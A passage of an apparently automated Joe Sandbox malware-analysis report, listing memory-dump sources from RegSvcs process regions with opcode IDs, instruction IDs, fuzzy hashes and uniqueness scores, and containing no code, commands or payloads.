                                              • Opcode Fuzzy Hash: c62cdba9aaa65ff58da2845cff0460cac787f943bdc76a1998ba7b7a2fce95d9
                                              • Instruction Fuzzy Hash: 5E0181726042559FDB05CF6DD844D96BBF9EF8A360B058166E848CB261DA30EC45CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84739f79aca5d22b1174d07ec22a6dd69763656df5e54fbaee792051695d8a23
                                              • Instruction ID: dae10d7441fa514664ce480383506a80f0b5d6ed345eabefd81c61d5186f060e
                                              • Opcode Fuzzy Hash: 84739f79aca5d22b1174d07ec22a6dd69763656df5e54fbaee792051695d8a23
                                              • Instruction Fuzzy Hash: D501DB302013429BC60EA668E860A6E7FE2EFCA2407044569D84A9B681EF20ED0687A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0e16dcb5ebfe237d3cfa1fbecd898abff27e740a05ebdd302734284e13ae20f
                                              • Instruction ID: ffadb50fddcc26264b4cba5df10cc68c3701c53f740793fac7654a972825b166
                                              • Opcode Fuzzy Hash: d0e16dcb5ebfe237d3cfa1fbecd898abff27e740a05ebdd302734284e13ae20f
                                              • Instruction Fuzzy Hash: 8001F230201316CFDB0AEB24E49496E7BA6DF81208710896DC645CF286DF21AD0A8BE2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa7ee8327fcb588c5b3a5dfac24bbb2badf739a08e23ee1fed26a80a50e63366
                                              • Instruction ID: 42b965f16e85dff3b6bf5eb9d3512869dca2de0db7abf70df084151aaffa18e2
                                              • Opcode Fuzzy Hash: fa7ee8327fcb588c5b3a5dfac24bbb2badf739a08e23ee1fed26a80a50e63366
                                              • Instruction Fuzzy Hash: 300100312007058BD729DF29E94094BBBE5EFC4350B00962DE55A87621DBB0BD098B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 585055fb9fb3fbc95a0625b1c5b50bbbf3f3373ea9f6b733db22e6f35afabfbd
                                              • Instruction ID: e55654ca2511ddd1c2ebf15ce3b9caa82b72704f0d0f1f2b300784dd8dbc537e
                                              • Opcode Fuzzy Hash: 585055fb9fb3fbc95a0625b1c5b50bbbf3f3373ea9f6b733db22e6f35afabfbd
                                              • Instruction Fuzzy Hash: 470169B4E14218ABDF04DFA9D944AEEBFF2AF88350F148129EC04B7350CB715A00CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58e46d9025fe1bf3dd08e173d0bde8c78868007313f4f0286e25f4d61d7e6d45
                                              • Instruction ID: c95b4315e360f583e6160ec6791132cf4ac582e8fdb823c26501546a6aa1aa50
                                              • Opcode Fuzzy Hash: 58e46d9025fe1bf3dd08e173d0bde8c78868007313f4f0286e25f4d61d7e6d45
                                              • Instruction Fuzzy Hash: 79F0B4B7B0022767E726084B9C50BBF6A5BEBD47A1F098035FE0583245CA36CD55A2A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45269bc8a51d75e8c2c9f7f1afde6477cbd594b126cebbce0994ce42b74ce077
                                              • Instruction ID: c8c58f962fd28c1071600a145b4415127a0df0e0dba2531d2db920565ec92e5e
                                              • Opcode Fuzzy Hash: 45269bc8a51d75e8c2c9f7f1afde6477cbd594b126cebbce0994ce42b74ce077
                                              • Instruction Fuzzy Hash: 83016DB0631303DFC739DA759A046A3B7E6BB85345B149C2DD90286A19DAB5E9C0CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fd9ba1fa66160f707cc442d11ce0cefc72ba62d8db9fd87fac3320ef7448c5c
                                              • Instruction ID: bc01ab6cafc58abfca2c26a18c932a1f4a16e6bb0f4294398345b21c205a23a6
                                              • Opcode Fuzzy Hash: 5fd9ba1fa66160f707cc442d11ce0cefc72ba62d8db9fd87fac3320ef7448c5c
                                              • Instruction Fuzzy Hash: 07F0A4759001089F8B50EFAAD8809DEBBF9FF98250750452BD509D3601D770A652CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 41e1fc4a75337f8f26ed6fe36d918b617b013afa20e2dfdbd00734d453b33604
                                              • Instruction ID: f8290e0343d3b86fb1052af874d041b6f394134ba93d9d2b02dba736a8e4a88a
                                              • Opcode Fuzzy Hash: 41e1fc4a75337f8f26ed6fe36d918b617b013afa20e2dfdbd00734d453b33604
                                              • Instruction Fuzzy Hash: E101A231300211CFDF0AFB24F45895D3BA2DBC2254750466CC2058F345DF719E068BD5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f47927cd88d1c091e2960de92667ed3096d7841aca1b46307d60cc5f748872e
                                              • Instruction ID: 354dab85c47fd8f635f4db418e76b7d990228e1b0b8ce20e6c3b4e3b8f9efcfd
                                              • Opcode Fuzzy Hash: 8f47927cd88d1c091e2960de92667ed3096d7841aca1b46307d60cc5f748872e
                                              • Instruction Fuzzy Hash: 12015AB5A50369DBEB04DF74ED80AAD7BB2BF89304F148119D905A7396DB719C00DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c5ff9e296cd9631bdda651fff42d41701d5a74289c96056a914ea2cd79184b2
                                              • Instruction ID: da24fab52535e11d5919db7cd31ff2d0a2dba865bc10fe26a79867daf2c90eb5
                                              • Opcode Fuzzy Hash: 3c5ff9e296cd9631bdda651fff42d41701d5a74289c96056a914ea2cd79184b2
                                              • Instruction Fuzzy Hash: 53F0F4353105118FD754DA3EE45485977DAAFCD65131590B9E606C7370DFB1DC018750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54056f860bb2586100025ccbf426f79791478e250314646ee63038e70da0f736
                                              • Instruction ID: 78c2f444af1cbcff80977a7c8891c745d871c5cb9dd9cf299d23f8134b222532
                                              • Opcode Fuzzy Hash: 54056f860bb2586100025ccbf426f79791478e250314646ee63038e70da0f736
                                              • Instruction Fuzzy Hash: E5F0E2B270935A6F9B25CA296C50DBF7FEDFB84228B08402AF80CC3201DA219805C762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b52844817853451b20e307bb36c8d0e3f85e0cc528894b10e828577b6cf524a1
                                              • Instruction ID: 0614122ebd95bab6db68e6ef04ba38e23c0e9a79ee6a83f268368a59aa3a44aa
                                              • Opcode Fuzzy Hash: b52844817853451b20e307bb36c8d0e3f85e0cc528894b10e828577b6cf524a1
                                              • Instruction Fuzzy Hash: 41F067313002019BDA4DEA29E85096E7BE6FBC9240714992CD50AABB40EF60ED0687E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Instruction ID: d51de614767fcd1f1e934286fd5e989d2e7724ab8462652ff77adcccb72108d2
                                              • Opcode Fuzzy Hash: 9f67b4af316f14dea633e1af250ff314612443c41da3bb3060f1ad471f69aebb
                                              • Instruction Fuzzy Hash: ADD0223000E3C76FC7032334BC6A4A17F2CDD4300030502CAE4888A013E64C1955C3E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d566a201a507cf60df5bf9456e4f6c0251cce1c7488235e71dad505d1376b47
                                              • Instruction ID: 67ddceb23e9250566ca6d64ac97e42eaad4916e479d73c0724c8967f02858694
                                              • Opcode Fuzzy Hash: 5d566a201a507cf60df5bf9456e4f6c0251cce1c7488235e71dad505d1376b47
                                              • Instruction Fuzzy Hash: 47D0127041F7C85FC7638B7898104577F788B0B250B1509EBE998CF723D5654A24C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd721fd389880657f515fea265e840ee5791f986f4c12a850b30d95453de18ba
                                              • Instruction ID: 81fd1e22248f39cbd2b46ea8932eb3554a6b8674aee79bd6a8f3cb14017681cc
                                              • Opcode Fuzzy Hash: bd721fd389880657f515fea265e840ee5791f986f4c12a850b30d95453de18ba
                                              • Instruction Fuzzy Hash: F3D09276B10214CFCB58DB68E85899CBBB0EB88225B0144AAE61ADB221DB7199518F10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 191276fa3468393072b884e57049aabb9ac53399a03b5c8ee484176289a6eac1
                                              • Instruction ID: 63ecb39ace13708aa6db1fef454955ede56754e5392cd85a8fd5fef70ecd85ac
                                              • Opcode Fuzzy Hash: 191276fa3468393072b884e57049aabb9ac53399a03b5c8ee484176289a6eac1
                                              • Instruction Fuzzy Hash: E8D0121420B3D20FDB03533058655967F25DB83204B4404CE94C48F6C3C2148D12D3F3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7a46b81f6268cd8b961b0a285547b8ba63d761399d8f61600d79aa7b573b222
                                              • Instruction ID: 04dc03144026453b33d32e26da1c53e07f8658fe8fb2745f2277b5b681439d4c
                                              • Opcode Fuzzy Hash: d7a46b81f6268cd8b961b0a285547b8ba63d761399d8f61600d79aa7b573b222
                                              • Instruction Fuzzy Hash: 91C0121520A3800BFB035230A8107832F628B83700F4640C6D0888FAE2CA1E8E01C3F2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 66a2bbdb54788f5206d30a1061b38e75848fdf16a137eaaf297930ab044a3db2
                                              • Instruction ID: 26097a9549a004fc2b4eaa4fe32dd99ebb84deae54ffdf037c1376669a9919d4
                                              • Opcode Fuzzy Hash: 66a2bbdb54788f5206d30a1061b38e75848fdf16a137eaaf297930ab044a3db2
                                              • Instruction Fuzzy Hash: 74D0C9B00593C46AC79356748804A867FB10B43301F16158BD1C0C805380550486E326
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40ca6eda42b716ba4805d29a208f18fc9632adb439cb619f04e31a6e25a997ff
                                              • Instruction ID: 94cb57e4f5b04db84b20bd8f8801ebab312935ef7c66357a9c8d20f4b1b1e06d
                                              • Opcode Fuzzy Hash: 40ca6eda42b716ba4805d29a208f18fc9632adb439cb619f04e31a6e25a997ff
                                              • Instruction Fuzzy Hash: 3ED012204492C1AFEB02AB30D9959457FF47F43308B2940CAC0448B093C7555427C711
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eca4c08967435a59cb7966a1a3756e23de38cc95ef7a8324c4873abd295c7b2b
                                              • Instruction ID: 2cb89c6d541759991c98d40a22b36b206b2d0c62aecb2a85bf23aa525e7bcad7
                                              • Opcode Fuzzy Hash: eca4c08967435a59cb7966a1a3756e23de38cc95ef7a8324c4873abd295c7b2b
                                              • Instruction Fuzzy Hash: 31C09B5654D3D53FD74386D49D92CD57F249C0311036E01CBD444D7553D15496F4C753
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c69007c6e2638fb709a51632a1636bff0c19b579b94badcbe1625ec0e3d0931d
                                              • Instruction ID: 75d3d806d360ee3324f3be9c2919fe00ce4bf108d3007e477e61f59ca2792f0b
                                              • Opcode Fuzzy Hash: c69007c6e2638fb709a51632a1636bff0c19b579b94badcbe1625ec0e3d0931d
                                              • Instruction Fuzzy Hash: 09C02B3140434FDBD60233B0F81C8D47F3CDB41108B001400B40C01016BE9C2C534AC4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6d02c4a59c8f2e2e6de49e95e7082314d472cfb895bf9c3e5327ea0ed633fb6
                                              • Instruction ID: 5cab900b2993ccfb56e921abebeb347b2e3b017639e81257c93b6a0e1b219aad
                                              • Opcode Fuzzy Hash: e6d02c4a59c8f2e2e6de49e95e7082314d472cfb895bf9c3e5327ea0ed633fb6
                                              • Instruction Fuzzy Hash: 78B0927090930CAF8620DA99980185ABBACDA1A210B4001EAEA0887320D972A9109AE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 898618e75abe1d889c7dc294ee255b8b40b70847e19694ec86a685c58898cd8a
                                              • Instruction ID: e438816b717ce14685c8c9097cbee308d70e46f52c71f72893f9ee352e86ed8e
                                              • Opcode Fuzzy Hash: 898618e75abe1d889c7dc294ee255b8b40b70847e19694ec86a685c58898cd8a
                                              • Instruction Fuzzy Hash: 6AC08CF8600300AFE348AB248C48A27BEE3EBD8321F02C818A20086228CE748851CA51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef9be3153cbc05ee4f5c1b6e72d4db32a2c35bd80444850fb280f8c5ec3ec3bd
                                              • Instruction ID: d2c6490dc7eb56cd8a56b84fceda8cf8ee30bd2a3711f2ac33ae1c49e73ba858
                                              • Opcode Fuzzy Hash: ef9be3153cbc05ee4f5c1b6e72d4db32a2c35bd80444850fb280f8c5ec3ec3bd
                                              • Instruction Fuzzy Hash: 81B09237A00019868A00D688E4404DCFB30DA94332F004033C200620408621196A8764
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                              • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                              • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                              • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9daf118bfbcc3bf9e3a36b33321736fd5490af0d73cb682b29b312aa5d5cce5
                                              • Instruction ID: 0d3249c45e54e982a1c7318e279da309283474fafde044080f2c3a1230d30425
                                              • Opcode Fuzzy Hash: b9daf118bfbcc3bf9e3a36b33321736fd5490af0d73cb682b29b312aa5d5cce5
                                              • Instruction Fuzzy Hash: 42B092311402088F82009B58E548C0137A8AB08A143010090E1088B232C621FC008A51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a57468e45b522e9f62c0e4fc24165146402edb316c2842cade32e52eb89d60d4
                                              • Instruction ID: 0f89da43d48e8546da21c571a1b68bf98e626838e4444cf3ccae743307a93113
                                              • Opcode Fuzzy Hash: a57468e45b522e9f62c0e4fc24165146402edb316c2842cade32e52eb89d60d4
                                              • Instruction Fuzzy Hash: 8FB0123101030ECBD5017774F8095147B1DE781604B401114B10D061459EEC684246C8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d43e2264246c4a0da3ac368cf2efe12590fdcd30fd38b4766a3432737d23ef98
                                              • Instruction ID: fe83ba7eac9e9e64623024d19600c3f52b75761d0f935106b299ef11d1cff018
                                              • Opcode Fuzzy Hash: d43e2264246c4a0da3ac368cf2efe12590fdcd30fd38b4766a3432737d23ef98
                                              • Instruction Fuzzy Hash: B1B0123100174F8FC9417778F54A5143F1ED6806147401114A10D09105ADEC690047C4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0cac1df5fab0cc3a7499f18a1ba8893fe420ee9bd22c9e21ae46c8839885bf98
                                              • Instruction ID: 7d5dd9f432c48dc25fb9416ca09c8da71379681309dd31e4ee4d6bcc0d887883
                                              • Opcode Fuzzy Hash: 0cac1df5fab0cc3a7499f18a1ba8893fe420ee9bd22c9e21ae46c8839885bf98
                                              • Instruction Fuzzy Hash: 7590023506870C8F85402796740A9D97B5C95445267C44151F50D425159E5568509995
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d t
                                              • API String ID: 0-2792223501
                                              • Opcode ID: 8e5e08473e81d1b6b44ffba60ea1f1bf55fd6098850867fd5a3e6f68576e5ee8
                                              • Instruction ID: 17dcb0f0eaca928e09b9e949f78ea93b2f1f2ab09b529b998b07d88b73055e35
                                              • Opcode Fuzzy Hash: 8e5e08473e81d1b6b44ffba60ea1f1bf55fd6098850867fd5a3e6f68576e5ee8
                                              • Instruction Fuzzy Hash: 3D517D30B142149FD714DF6DC498A5EBBF6EF89700F2581AAE406EB3A1CB719D05CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 338e1fef861a049ae559a2ce4217923ead42890ce06297af897717a8fa4717df
                                              • Instruction ID: 426ff52bfb95c7df2f41ea35544ff5c3b9ff50c3180c129620a194cad113da23
                                              • Opcode Fuzzy Hash: 338e1fef861a049ae559a2ce4217923ead42890ce06297af897717a8fa4717df
                                              • Instruction Fuzzy Hash: C74193317042058FDB15DF69D498B9DBBF6EF89304F1445AAE105EB3A1CB759C05CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71a844240d890e29566062797206be53cbf79441acd4931265dae75d32110e21
                                              • Instruction ID: 04d56e20cc407549bc69e53e4822e85738e4a06752d62b7636f6379edfa71399
                                              • Opcode Fuzzy Hash: 71a844240d890e29566062797206be53cbf79441acd4931265dae75d32110e21
                                              • Instruction Fuzzy Hash: 8B51FB3C102202CFC706FB34FA549893BB2FB84709310956DD5099BB6DEBB9A946CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18944be6a16be425b0fea874224a10e6f8cff498c04e52a9d1129fb283a62391
                                              • Instruction ID: dafbd9d33c72ce6576905c398b1803fd56065172195e149cd31d21b7b21e70b0
                                              • Opcode Fuzzy Hash: 18944be6a16be425b0fea874224a10e6f8cff498c04e52a9d1129fb283a62391
                                              • Instruction Fuzzy Hash: 12419F70E042499FDB04DBFD889466EBFF6EFC9300F208569D44AD7382DA7499468BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000001F.00000002.2806893606.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_31_2_2900000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 21d4d0c767d7e8c3a3196c9da1bd0448cd7f7310e5c1eb86e5db001b43a72674
                                              • Instruction ID: dce6bbee576057b3ff8021b791bb5921a593469be2f927f5413a27085e6142ba
                                              • Opcode Fuzzy Hash: 21d4d0c767d7e8c3a3196c9da1bd0448cd7f7310e5c1eb86e5db001b43a72674